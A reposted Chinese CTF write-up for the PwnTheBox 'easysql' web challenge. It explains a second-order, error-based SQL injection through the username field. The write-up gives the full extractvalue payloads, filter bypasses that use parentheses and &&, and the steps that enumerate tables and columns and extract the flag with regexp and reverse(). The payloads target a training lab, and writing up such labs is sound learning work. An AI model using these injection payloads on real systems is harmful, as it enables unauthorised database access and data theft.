IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 大数据 -> PwnTheBox(web篇)---easysql -> 正文阅读

[大数据]PwnTheBox(web篇)---easysql

PwnTheBox(web篇)—easysql

题目介绍

进入训练平台后会出现两个功能按钮,一个是登陆,一个是注册。登陆成功后可以查看文章,点击用户名可以修改密码。

验证sql注入

二次注入

我们注册一个带有 " 的账号提示报错了,报错信息如下:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"123"" and pwd='202cb962ac59075b964b07152d234b70'' at line 1

因此猜想在修改密码的时候的sql语句的构造

update tableName set pwd='xxxxx' where username='aaa' and pwd='xxx'

其中username是我们注册的用户名,并且报错信息会展示出来。因此我们可以使用报错注入,使用extractvalue函数来帮助我们找出我们想要的信息。

题目过滤了and ,<>,空格,/**/等特殊符号,可用()替换空格

查看当前数据库

1"&&(extractvalue(1,concat(1,(select(database())))))#

XPATH syntax error: ‘web_sqli’

查看库所有的表

1"&&(extractvalue(1,concat(1,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))))#       

XPATH syntax error: ‘article,flag,users’

查看flag表中所有的字段

1"&&(extractvalue(1,concat(1,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')))))#

XPATH syntax error: ‘flag’

查看flag,假的

1"&&(extractvalue(1,concat(1,(select(group_concat(flag))from(flag)))))#

XPATH syntax error: ‘RCTF{Good job! But flag not here’

查看users表中所有的字段

1"&&(extractvalue(1,concat(1,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')))))#

XPATH syntax error: ‘name,pwd,email,real_flag_1s_here’

查看flag,但有干扰数据

1"&&(extractvalue(1,concat(1,(select(group_concat(real_flag_1s_here))from(users)))))#

XPATH syntax error: ‘xxx,xxx,xxx,xxx,xxx,xxx,xxx,xxx,’

正则绕过,查看flag,但位数不够

1"&&(extractvalue(1,concat(1,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^P')))))#

XPATH syntax error: ‘PTB{21eb0c6a-32ec-43db-a8bd-688a’

逆序输出flag

1"&&(extractvalue(1,concat(1,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^P'))))))#

XPATH syntax error: ‘}077c12f7a886-db8a-bd34-ce23-a6c’ -> c6a-32ec-43db-a8bd-688a7f21c770}

  大数据 最新文章
实现Kafka至少消费一次
亚马逊云科技:还在苦于ETL?Zero ETL的时代
初探MapReduce
【SpringBoot框架篇】32.基于注解+redis实现
Elasticsearch:如何减少 Elasticsearch 集
Go redis操作
Redis面试题
专题五 Redis高并发场景
基于GBase8s和Calcite的多数据源查询
Redis——底层数据结构原理
上一篇文章      下一篇文章      查看所有文章
加:2022-05-05 11:25:14  更:2022-05-05 11:26:37 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/24 0:41:11-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码